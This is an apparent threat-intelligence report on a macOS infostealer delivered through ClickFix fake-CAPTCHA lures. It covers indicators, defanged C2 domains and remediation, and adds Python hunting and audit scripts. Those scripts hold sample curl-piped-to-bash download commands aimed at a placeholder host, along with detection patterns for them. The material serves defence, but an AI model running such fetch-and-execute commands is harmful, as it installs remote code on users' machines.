Technical Analysis & Remediations
MITRE ATT&CK Mapping
T1204.002 - User Execution: Malicious File (ClickFix CAPTCHA lures).
T1059.004 - Command and Scripting Interpreter: Unix Shell (initial Bash dropper).
T1140 - Deobfuscate/Decode Files or Information (Base64-decoded curl commands).
T1555.001 - Credentials from Password Stores: Keychain.
T1552 - Unsecured Credentials: plaintext secrets in developer files (.env).
CVE Profile
NVD Score: N/A (Social Engineering)
CISA KEV Status: Inactive.
The malware does not exploit a software vulnerability; it abuses legitimate macOS administrative utilities.
Telemetry
Hashes
MD5 (Dropper): da73e42d1f9746065f061a6e85e28f0c
SHA256 (Stage-3 Payload): 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958
Network (Refanged)
hxxps://update-check[.]com (C2 / Payload Delivery)
hxxps://update-check[.]com/m/7d8df27d95d9 (Stage 1 Dropper)
hxxps://Infiniti-stealer[.]com (Operator Panel)
Artifacts
Directory structure: /tmp/.2835b1b5098587a9XXXXXX
Debug Log: /tmp/.bs_debug.log
Packer Magic: 4b 41 59 28 b5 2f fd (Nuitka KAY + zstd compression)
The payload structure indicates evasion routines that check for sandbox environments (VMware, VirtualBox, any.run, Joe Sandbox, Hybrid Analysis) before proceeding with execution.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command: Initiate incident response protocols for potential credential compromise affecting developer environments and enterprise single sign-on (SSO) tokens.
DETECT (DE) – Monitoring & Analysis
Command: Deploy EDR hunting queries targeting Terminal execution of curl piped to bash that explicitly contains base64 --decode logic.
Command: Alert on anomalous execution of xattr -dr com.apple.quarantine originating from /tmp directories.
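The two DETECT hunts above (curl piped to bash with base64 --decode, and xattr -dr com.apple.quarantine under /tmp), together with the Terminal -> curl -> /tmp execution chain the closing Note calls out, expressed as behavioral rules run over process-execution events. This is an added example, not Malwarebytes' detection content: the event fields (parent, cwd, cmdline), the rule names, the regexes and the sample command lines are assumptions, and example.invalid is a placeholder host. The rules also decode any inline base64 blob so that a curl stage hidden behind echo | base64 --decode is still matched.

```python
import base64
import re
from typing import Dict, List

# Illustrative hunting rules for the behaviors described in the report.
B64_DECODE = re.compile(r"\bbase64\s+(?:--decode|-d|-D)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")
CURL = re.compile(r"\bcurl\b")
# xattr whose flag group contains 'd' (covers -d and -dr) aimed at the quarantine attribute
QUARANTINE_STRIP = re.compile(r"\bxattr\s+-[A-Za-z]*d[A-Za-z]*\s+com\.apple\.quarantine\b")
# A /tmp path token; macOS EDRs often report the resolved /private/tmp form
TMP_PATH = re.compile(r"(?:^|[\s'\"=])(?:/private)?/tmp/")
# A program path inside a hidden directory under /tmp (cf. /tmp/.2835b1b5098587a9XXXXXX)
HIDDEN_TMP_EXEC = re.compile(r"^(?:/private)?/tmp/\.[\w-]+/")
# 'echo <base64> |' preceding a decode; the blob is decoded to inspect what it hides
B64_BLOB = re.compile(r"\becho\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|")


def decoded_payload(cmdline: str) -> str:
    """Return the decoded text of an 'echo <base64> |' blob, or '' if there is none."""
    m = B64_BLOB.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule this event trips (empty list if none)."""
    cmd = event.get("cmdline", "")
    cwd = event.get("cwd", "")
    hits: List[str] = []
    if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        hits.append("base64_decode_piped_to_shell")
    # Check curl in the visible command and in the decoded blob, since the
    # report's droppers hide the curl stage behind base64.
    visible_and_decoded = cmd + " " + decoded_payload(cmd)
    if CURL.search(visible_and_decoded) and PIPE_TO_SHELL.search(visible_and_decoded):
        hits.append("curl_piped_to_shell")
    if QUARANTINE_STRIP.search(cmd) and (TMP_PATH.search(cmd) or cwd.startswith(("/tmp", "/private/tmp"))):
        hits.append("quarantine_stripped_in_tmp")
    tokens = cmd.split()
    if tokens and HIDDEN_TMP_EXEC.match(tokens[0]):
        hits.append("exec_from_hidden_tmp_dir")
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> tripped rules for every event that tripped at least one."""
    results: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        tripped = evaluate(event)
        if tripped:
            results[i] = tripped
    return results


# Constructed sample events (not real telemetry). The blob hides a curl|bash
# one-liner the way a ClickFix dropper does; example.invalid is a placeholder.
_BLOB = base64.b64encode(b"curl -fsSL https://example.invalid/stage1 | bash").decode()
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "Terminal", "cwd": "/Users/dev",
     "cmdline": f"bash -c 'echo {_BLOB} | base64 --decode | bash'"},
    {"parent": "bash", "cwd": "/tmp/.2835b1b5098587a9abc123",
     "cmdline": "xattr -dr com.apple.quarantine /tmp/.2835b1b5098587a9abc123"},
    {"parent": "bash", "cwd": "/tmp/.2835b1b5098587a9abc123",
     "cmdline": "/private/tmp/.2835b1b5098587a9abc123/update --silent"},
    {"parent": "Terminal", "cwd": "/Users/dev/project",
     "cmdline": "curl -sS https://example.invalid/api/status"},  # benign: no pipe to a shell
    {"parent": "Terminal", "cwd": "/Users/dev",
     "cmdline": "base64 --decode report.b64 > report.pdf"},  # benign: decode to a file
    {"parent": "Terminal", "cwd": "/Users/dev/Downloads",
     "cmdline": "xattr -d com.apple.quarantine ./tool.dmg"},  # benign: not under /tmp
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], "->", ", ".join(rules))
```

The three benign events show why each rule needs its second condition: base64 decoding to a file, a plain curl call, and stripping quarantine from a download in ~/Downloads are all routine developer activity, and alerting on the bare tokens would drown the SOC in noise.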
RESPOND (RS) – Mitigation & Containment
Command: Isolate affected macOS endpoints from the corporate network immediately.
Command: Block the domains update-check[.]com and Infiniti-stealer[.]com at the secure web gateway and DNS levels.
RECOVER (RC) – Restoration & Trust
Command: Force global password resets and revoke all active session tokens, SSH keys, and API tokens for affected users.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command: Implement Endpoint Privilege Management (EPM) to restrict standard users from executing unapproved scripts in Terminal.
Command: Conduct security awareness training focusing specifically on ClickFix methodologies and fake CAPTCHA human-verification lures.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command: Disconnect the affected Mac from the internet immediately to halt ongoing data exfiltration.
Command: Do not log into banking, email, or cryptocurrency wallets from the compromised device until it is verified clean.
Priority 2: Identity
Command: Reset all critical passwords (Apple ID, banking, primary email) and ensure MFA is enabled, using a known clean device (e.g., your smartphone on a cellular network).
Priority 3: Persistence
Command: Check /tmp/ for hidden files (e.g., .bs_debug.log) and audit ~/Library/LaunchAgents/ for unauthorized persistence mechanisms.
Command: Run a comprehensive scan using a reputable anti-malware solution designed for macOS to eradicate the Stage-2 and Stage-3 Nuitka payloads.
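The Priority 3 checks (hidden files in /tmp, unauthorized LaunchAgents) as a small audit script. This is an added example, not a Malwarebytes tool: the staging-directory name regex (16 hex characters plus a 6-character suffix) is an assumption about how the random part of /tmp/.2835b1b5098587a9XXXXXX is formed, the LaunchAgent heuristics (program arguments that reference /tmp, curl or base64) are the author's own, and the sample plists and paths are constructed. The script builds a throwaway copy of the two locations so it runs offline; pointing the two audit functions at the real /tmp and ~/Library/LaunchAgents is the intended use.

```python
import os
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List
from xml.parsers.expat import ExpatError

# Indicators from the report: the hidden debug log and the hidden staging
# directory. The regex is an assumption about the staging directory's random suffix.
KNOWN_TMP_NAMES = {".bs_debug.log"}
STAGING_DIR_RE = re.compile(r"^\.[0-9a-f]{16}[A-Za-z0-9]{6}$")
# LaunchAgent program arguments that point at /tmp or fetch/decode content at launch
SUSPICIOUS_ARG_RE = re.compile(r"(?:/private)?/tmp/|\bcurl\b|\bbase64\b")


def find_hidden_tmp_artifacts(tmp_dir: str) -> List[Dict[str, str]]:
    """List dot-prefixed entries in tmp_dir with a reason for each; hidden /tmp entries are rare on a clean Mac."""
    findings: List[Dict[str, str]] = []
    for name in sorted(os.listdir(tmp_dir)):
        if not name.startswith("."):
            continue
        if name in KNOWN_TMP_NAMES:
            reason = "known indicator"
        elif STAGING_DIR_RE.match(name):
            reason = "matches hidden staging-directory pattern"
        else:
            reason = "hidden entry in /tmp (review manually)"
        findings.append({"path": os.path.join(tmp_dir, name), "reason": reason})
    return findings


def audit_launch_agents(agents_dir: str) -> List[Dict[str, object]]:
    """Parse every .plist in agents_dir and report those whose program references /tmp, curl or base64."""
    findings: List[Dict[str, object]] = []
    for path in sorted(Path(agents_dir).glob("*.plist")):
        try:
            with open(path, "rb") as fp:
                plist = plistlib.load(fp)
        except (plistlib.InvalidFileException, ExpatError, ValueError) as exc:
            # A plist launchd cannot parse is itself worth a look
            findings.append({"path": str(path), "label": "", "reasons": [f"unparseable plist: {exc}"]})
            continue
        args = [str(a) for a in plist.get("ProgramArguments", [])]
        if "Program" in plist:
            args.insert(0, str(plist["Program"]))
        reasons: List[str] = []
        if SUSPICIOUS_ARG_RE.search(" ".join(args)):
            reasons.append("program arguments reference /tmp, curl or base64")
            if plist.get("RunAtLoad"):
                reasons.append("RunAtLoad is set")  # corroborating: it starts at every login
        if reasons:
            findings.append({"path": str(path), "label": str(plist.get("Label", "")), "reasons": reasons})
    return findings


def build_sample_environment(root: str) -> Dict[str, str]:
    """Create a constructed /tmp and ~/Library/LaunchAgents layout under root (sample data, not a real infection)."""
    tmp_dir = os.path.join(root, "tmp")
    agents_dir = os.path.join(root, "Library", "LaunchAgents")
    os.makedirs(os.path.join(tmp_dir, ".2835b1b5098587a9abc123"))  # hidden staging dir
    os.makedirs(os.path.join(tmp_dir, "build-cache"))  # non-hidden entry, ignored
    os.makedirs(agents_dir)
    Path(tmp_dir, ".bs_debug.log").write_text("constructed sample log\n")
    suspicious = {"Label": "com.example.updater", "RunAtLoad": True,
                  "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL https://example.invalid/s | bash"]}
    benign = {"Label": "com.example.sync", "RunAtLoad": True,
              "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync", "--background"]}
    for item in (suspicious, benign):
        with open(os.path.join(agents_dir, str(item["Label"]) + ".plist"), "wb") as fp:
            plistlib.dump(item, fp)
    return {"tmp": tmp_dir, "agents": agents_dir}


def run_sample_audit() -> Dict[str, list]:
    """Build the sample layout in a temporary directory, audit it, and return both sets of findings."""
    with tempfile.TemporaryDirectory() as root:
        dirs = build_sample_environment(root)
        return {"tmp": find_hidden_tmp_artifacts(dirs["tmp"]),
                "agents": audit_launch_agents(dirs["agents"])}


if __name__ == "__main__":
    # On a real machine, call find_hidden_tmp_artifacts("/tmp") and
    # audit_launch_agents(os.path.expanduser("~/Library/LaunchAgents")) instead.
    for section, items in run_sample_audit().items():
        for item in items:
            print(section, item)
```

A finding is a prompt to inspect, not proof of compromise: a legitimate agent can reference curl, and a hidden /tmp entry can be left by development tooling. The value of the script is that it surfaces the two locations the report names in one pass so nothing is skipped under pressure.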
Hardening & References
Baseline: Apply CIS Apple macOS Benchmarks to restrict terminal execution policies and enforce strict Gatekeeper configurations.
Framework: NIST CSF 2.0 PR.AT-1 (Identity Management and Authentication) and PR.DS-1 (Data-at-rest protection for developer secrets).
Note: Native macOS binaries compiled via Nuitka bypass standard Python script detection. Detection engineering must focus on the behavioral execution chain (Terminal -> curl -> /tmp execution) rather than static file analysis alone.
Source: Malwarebytes Threat Intelligence